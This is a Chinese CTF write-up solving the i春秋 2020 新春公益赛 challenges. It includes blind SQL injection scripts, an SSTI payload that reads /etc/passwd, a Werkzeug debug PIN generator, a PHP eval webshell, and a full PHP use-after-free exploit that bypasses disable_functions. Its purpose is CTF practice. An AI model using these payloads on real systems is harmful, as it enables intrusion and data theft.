ichunqiu 新春公益赛
文章目录
- 公益赛
- day1
- 签到
- code_in_morse
- web
- ezupload
- day2
- easysqli_copy
- Ezsqli
- blacklist
- day3
- Flaskapp
- easy_thinking
公益赛
day1
签到
- 观看视频,最后得到flag
code_in_morse
先用 CyberChef得到一张图片
得到的图片扫描后得到一个图片
f5隐写得到flag
web
- 弱口令admin admin888 登陆
- 在search界面发现注入点,用sqlmap配置cookie直接爆破
ezupload
- 上传一句话木马
- 执行 bash -c /readflag > tmp
- 执行 cat tmp
day2
easysqli_copy
- 审计代码。发现可以利用宽字节注入使用’,再使用时间盲注获取数据,构造paylaod闭合语句
- 过滤了select,但是可以用concat+char构造select
- 用set+prepare+execute 来读取数据
- 先读表名table1再读列名fllllll4g,最后爆破flag
import requests
url = ''
res = ''
for i in range(1,43):for s in range(45,126):t1 = 'select if(ascii(substr((select fllllll4g from table1),{},1))={},sleep(10),1)'.format(i,s)t2 = ''for k in t1:t2 += 'char({}),'.format(ord(k))t3 = "set @t1=concat({});PREPARE t2 FROM @t1;EXECUTE t2;||{}%271{}%27={}%271".format(t2[:-1],"%df","%df","%df")payload = '?id=1{}%27;{}'.format('%df',t3)try:re1 = requests.get(url+payload,timeout=5)except Exception as e:res += chr(s)print(res)break
print('res:'+res)
Ezsqli
通过测试发现 8 || 1=1 回显Nu1L,8 || 1=0 不回显,所以可以实现盲注
测试得过滤了 in 和 union select
首先爆表,但是过滤了in 所以用
select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1)
得到表名
f1ag_1s_h3r3_hhhhh
获取数据采用无列名注入,参考的paylaod是
(select 'admin','admin')>(select * from users limit 1)
构造最终payload
import requests
from lxml import etree
def get_data(payload):url = ''data = {'id':payload}req = requests.post(url,data=data) data = req.textreturn data
res = ''
for i in range(1,100):flag = 0for j in range(45,126):a1 = str(hex(j)).replace('0x','')a2 = ''for k in res:a2 += str(hex(ord(k))).replace('0x','')# f1ag_1s_h3r3_hhhhhpayload = "id=9|| (( select 1,0x{} )> (select * from (f1ag_1s_h3r3_hhhhh)))".format(a2+a1)# print(payload)data = get_data(payload)if 'hacker' in data:exit(-1)if 'Nu1L' in data:print(chr(j-1))res += chr(j-1)flag = 1print(res)breakif flag:passelse:breakprint(res)
blacklist
- 类似强网杯的随便注
- 但是用随便注的方法只能获取到表名和列名
- 于是尝试用handler
- 构造paylaod
inject=1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
- 获得flag
day3
Flaskapp
- 利用base64decode进行ssti模板注入读取文件
config e3tjb25maWd9fQ== 'SECRET_KEY': 's_e_c_r_e_t_k_e_y',
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd', 'r').read() }}{% endif %}{% endfor %}
eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiBjLl9fbmFtZV9fPT0nY2F0Y2hfd2FybmluZ3MnICV9e3sgYy5fX2luaXRfXy5fX2dsb2JhbHNfX1snX19idWlsdGluc19fJ10ub3BlbignL2V0Yy9wYXNzd2QnLCAncicpLnJlYWQoKSB9fXslIGVuZGlmICV9eyUgZW5kZm9yICV9/sys/class/net/eth0/address
eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiBjLl9fbmFtZV9fPT0nY2F0Y2hfd2FybmluZ3MnICV9e3sgYy5fX2luaXRfXy5fX2dsb2JhbHNfX1snX19idWlsdGluc19fJ10ub3BlbignL3N5cy9jbGFzcy9uZXQvZXRoMC9hZGRyZXNzJywgJ3InKS5yZWFkKCkgfX17JSBlbmRpZiAlfXslIGVuZGZvciAlfQ==
02:42:ac:12:00:06
2485377957894
/proc/self/cgroup
eyUgZm9yIGMgaW4gW10uX19jbGFzc19fLl9fYmFzZV9fLl9fc3ViY2xhc3Nlc19fKCkgJX17JSBpZiBjLl9fbmFtZV9fPT0nY2F0Y2hfd2FybmluZ3MnICV9e3sgYy5fX2luaXRfXy5fX2dsb2JhbHNfX1snX19idWlsdGluc19fJ10ub3BlbignL3Byb2Mvc2VsZi9jZ3JvdXAnLCAncicpLnJlYWQoKSB9fXslIGVuZGlmICV9eyUgZW5kZm9yICV912:perf_event:/docker/97e3793194a6e8c1ea3c5081158f336f3f46797be8f44207ee5ed3b49f85ea1f
- 利用读取的信息构造pin码
import hashlib
from itertools import chain
probably_public_bits = ['flaskweb',# 'flask.app',# modname'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]private_bits = [# str(uuid.getnode()), /sys/class/net/ens33/address /sys/class/net/eth0/address#02:42:ac:16:00:06'2485377957894',# get_machine_id(), /etc/machin-id /proc/self/cgroup 6afeacdf-afcf-4552-8502-719172374dda'97e3793194a6e8c1ea3c5081158f336f3f46797be8f44207ee5ed3b49f85ea1f'
]h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):if not bit:continueif isinstance(bit, str):bit = bit.encode('utf-8')h.update(bit)
h.update(b'cookiesalt')cookie_name = '__wzd' + h.hexdigest()[:20]num = None
if num is None:h.update(b'pinsalt')num = ('%09d' % int(h.hexdigest(), 16))[:9]rv =None
if rv is None:for group_size in 5, 4, 3:if len(num) % group_size == 0:rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')for x in range(0, len(num), group_size))breakelse:rv = numprint(rv)
- 利用pin码进入debug界面
- 读取flag
import osos.listdir('/')open('jibuqingle.txt','r').read()
easy_thinking
- 通过测试发现是tp6框架
- 搜索到tp6有任意文件操作漏洞
- 测试得/runtime/session/文件夹存在
- 于是修改session为.php结尾
- 查看session文件,可以发现储存的是搜索历史
- 在搜索框搜索
<?php @eval($_GET['rdd']);?>
- 然后连接shell
- 执行phpinfo(),发现禁用了好多函数
- 没法直接命令执行
- 考虑bypass,使用师傅的bypass脚本
- 最后用copy函数远程复制脚本
- 运行脚本得flag
<?php
//pwn("/readflag");
@pwn($_GET['rdd']);
function pwn($cmd) {global $abc, $helper;function str2ptr(&$str, $p = 0, $s = 8) {$address = 0;for($j = $s-1; $j >= 0; $j--) {$address <<= 8;$address |= ord($str[$p+$j]);}return $address;}function ptr2str($ptr, $m = 8) {$out = "";for ($i=0; $i < $m; $i++) {$out .= chr($ptr & 0xff);$ptr >>= 8;}return $out;}function write(&$str, $p, $v, $n = 8) {$i = 0;for($i = 0; $i < $n; $i++) {$str[$p + $i] = chr($v & 0xff);$v >>= 8;}}function leak($addr, $p = 0, $s = 8) {global $abc, $helper;write($abc, 0x68, $addr + $p - 0x10);$leak = strlen($helper->a);if($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type = leak($base, 0x10, 2);$e_phoff = leak($base, 0x20);$e_phentsize = leak($base, 0x36, 2);$e_phnum = leak($base, 0x38, 2);for($i = 0; $i < $e_phnum; $i++) {$header = $base + $e_phoff + $i * $e_phentsize;$p_type = leak($header, 0, 4);$p_flags = leak($header, 4, 4);$p_vaddr = leak($header, 0x10);$p_memsz = leak($header, 0x28);if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write# handle pie$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;$data_size = $p_memsz;} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec$text_size = $p_memsz;}}if(!$data_addr || !$text_size || !$data_size)return false;return [$data_addr, $text_size, $data_size];}function get_basic_funcs($base, $elf) {list($data_addr, $text_size, $data_size) = $elf;for($i = 0; $i < $data_size / 8; $i++) {$leak = leak($data_addr, $i * 8);if($leak - $base > 0 && $leak - $base < $text_size) {$deref = leak($leak);# 'constant' constant checkif($deref != 0x746e6174736e6f63)continue;} else continue;$leak = leak($data_addr, ($i + 4) * 8);if($leak - $base > 0 && $leak - $base < $text_size) {$deref = leak($leak);# 'bin2hex' constant checkif($deref != 0x786568326e6962)continue;} else continue;return $data_addr + $i * 8;}}function get_binary_base($binary_leak) {$base = 0;$start = $binary_leak & 0xfffffffffffff000;for($i = 0; $i < 0x1000; $i++) {$addr = $start - 0x1000 * $i;$leak = leak($addr, 0, 7);if($leak == 0x10102464c457f) { # ELF headerreturn $addr;}}}function get_system($basic_funcs) {$addr = $basic_funcs;do {$f_entry = leak($addr);$f_name = leak($f_entry, 0, 6);if($f_name == 0x6d6574737973) { # systemreturn leak($addr + 8);}$addr += 0x20;} while($f_entry != 0);return false;}class ryat {var $ryat;var $chtg;function __destruct(){$this->chtg = $this->ryat;$this->ryat = 1;}}class Helper {public $a, $b, $c, $d;}if(stristr(PHP_OS, 'WIN')) {die('This PoC is for *nix systems only.');}$n_alloc = 10; # increase this value if you get segfaults$contiguous = [];for($i = 0; $i < $n_alloc; $i++)$contiguous[] = str_repeat('A', 79);$poc = 'a:4:{i:0;i:1;i:1;a:1:{i:0;O:4:"ryat":2:{s:4:"ryat";R:3;s:4:"chtg";i:2;}}i:1;i:3;i:2;R:5;}';$out = unserialize($poc);gc_collect_cycles();$v = [];$v[0] = ptr2str(0, 79);unset($v);$abc = $out[2][0];$helper = new Helper;$helper->b = function ($x) { };if(strlen($abc) == 79 || strlen($abc) == 0) {die("UAF failed");}# leaks$closure_handlers = str2ptr($abc, 0);$php_heap = str2ptr($abc, 0x58);$abc_addr = $php_heap - 0xc8;# fake valuewrite($abc, 0x60, 2);write($abc, 0x70, 6);# fake referencewrite($abc, 0x10, $abc_addr + 0x60);write($abc, 0x18, 0xa);$closure_obj = str2ptr($abc, 0x20);$binary_leak = leak($closure_handlers, 8);if(!($base = get_binary_base($binary_leak))) {die("Couldn't determine binary base address");}if(!($elf = parse_elf($base))) {die("Couldn't parse ELF header");}if(!($basic_funcs = get_basic_funcs($base, $elf))) {die("Couldn't get basic_functions address");}if(!($zif_system = get_system($basic_funcs))) {die("Couldn't get zif_system address");}# fake closure object$fake_obj_offset = 0xd0;for($i = 0; $i < 0x110; $i += 8) {write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));}# pwnwrite($abc, 0x20, $abc_addr + $fake_obj_offset);write($abc, 0xd0 + 0x38, 1, 4); # internal func typewrite($abc, 0xd0 + 0x68, $zif_system); # internal func handler($helper->b)($cmd);exit();
}
ichunqiu 新春公益赛相关推荐
- i春秋2020新春公益赛WEB复现Writeup
i春秋2020新春公益赛WEB复现Writeup 说实话这个比赛打的我是一点毛病都没有,还是觉得自己掌握的东西太少了,,, 尤其是sql注入,都被大佬们玩出花来了,可能自己太菜,,,哭了!!! 关于S ...
- i春秋2020新春公益赛 GYCTF有关SQL注入题复现
0x00 前言 最近这段时间参加过一些CTF在线竞赛,做过一些Web题,发现SQL注入漏洞出现的频率可真高!不过在做题中也get到了一些Web新知识,现在通过题目复现的方式总结一下. 0x01 bla ...
- ctfshow 2022新春迎新赛(详细解说)
ctfshow 新春迎新赛 热身 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-01-16 15:42:02 # @ ...
- ctfshow _新春欢乐赛
ctfshow _新春欢乐赛 写在前面:这样每天一道题目,深入学习一个知识点,对于语言的理解会更加清晰,也通过这几天的做题学到很多东西,这里总结下做题过程,下次遇到相同问题能够避免 热身 这个题开始做 ...
- ichunqiu圣诞欢乐赛babyre
ichunqiu圣诞欢乐赛babyre 程序关键函数在此 此处是一些有关于多线程的函数,正好借此机会学习一下,顺便学习了一下多线程调试文章如下 https://bbs.pediy.com/thread ...
- i春秋新春战疫公益赛复现
blaklist 以前做过BUU的强网杯随便注,不过当时的两种解法都不行,做了这道题算是又学会了一种方法,直接记录在BUU的博客里了: https://blog.csdn.net/qq_4465789 ...
- 2020新春战疫ctf公益赛——Misc套娃
一看套娃就能猜到会是一个繁琐的题目,从压缩包里放着压缩包可以猜测整个题目的过程中寻找压缩包密码是一条主线. 第一层 很明显的txt里边Ook的加密,解密便得到压缩包2的密码. brainfuck/Oo ...
- 2020新春战疫网络安全公益赛——MISC套娃
对于这个题,膜拜出题人的脑洞,废话不多说,上wp MISC套娃 第一层 打开1.txt 全是Ook 可知是Ook加密,可以得到第二层的密码 然后还有张唐僧的图片,用Hex editor分析,发现最后有 ...
- [ctfshow]2022 新春欢乐赛 wp
热身 开局看到源码,但是却没有显示源码的代码.那么只能是被包含进去了,直接phpinfo搜prepend可以看到包含的文件,查看之得到flag. ?f=system("tac etc/ssh ...
最新文章
- shellinabox安装
- 总结|深度学习实现缺陷检测
- html引入avalon,avalon中文文档
- java整数翻转_java实现整数反转
- python中列表元素类型可以不同吗_list列表等同于数组,是一种放数据的容器
- TestNG-详解preserve-order的作用与测试case的执行顺序
- 科学计算机fix sci,计算器按mode出来的comp、SD、REG、DEg、Rad、Gra、Fix、Sci、Norm、Disp、是什么意思?...
- 第一天docker入门
- 流体力学CFD前处理软件-Gambit
- 【NLP】第 6 章:XGBoost 超参数
- [Java学习] 小型社交平台,能发帖、查看、评论、删除帖子等功能
- 醋醋SEO基础入门教程_seo入门基础知识
- 【必看】没用的旧手机还能换钱,换换回收手机回收价格表曝光
- Codeforces 274E. Mirror Room-模拟+STL
- Android移动开发-Android设备利用光线传感器监测光照强度的实现
- macbook或mac Apple ID 更新提示连接服务器出错
- 基于STM32的RC522模块读写数据块以及电子钱包充值扣款系统的设计
- Python之绘制个人足迹地图
- 2023年全国最新高校辅导员精选真题及答案53
- 【java】计算员工工资
热门文章
- 济南大学计算机水平怎么样,济南大学考研难吗?一般要什么水平才可以进入?...
- 985 高校副教授一年工资多少?
- 【模型蒸馏】TinyBERT: Distilling BERT for Natural Language Understanding
- 1971旗舰cpu intel_最强CPU诞生:Intel正式发布Xeon E7 v4系列处理器 - IT之家
- 微信小程序的文件结构 —— 微信小程序教程系列(1)
- 阴阳师服务器维护2月20,阴阳师2月19日更新维护公告 大妖试炼超鬼王来袭
- Java学习——Java基础
- 产品体验报告:写作框架
- 拂面微风之项目一:皖新传媒(新华书店)项目
- 雨林木风 Windows server 2003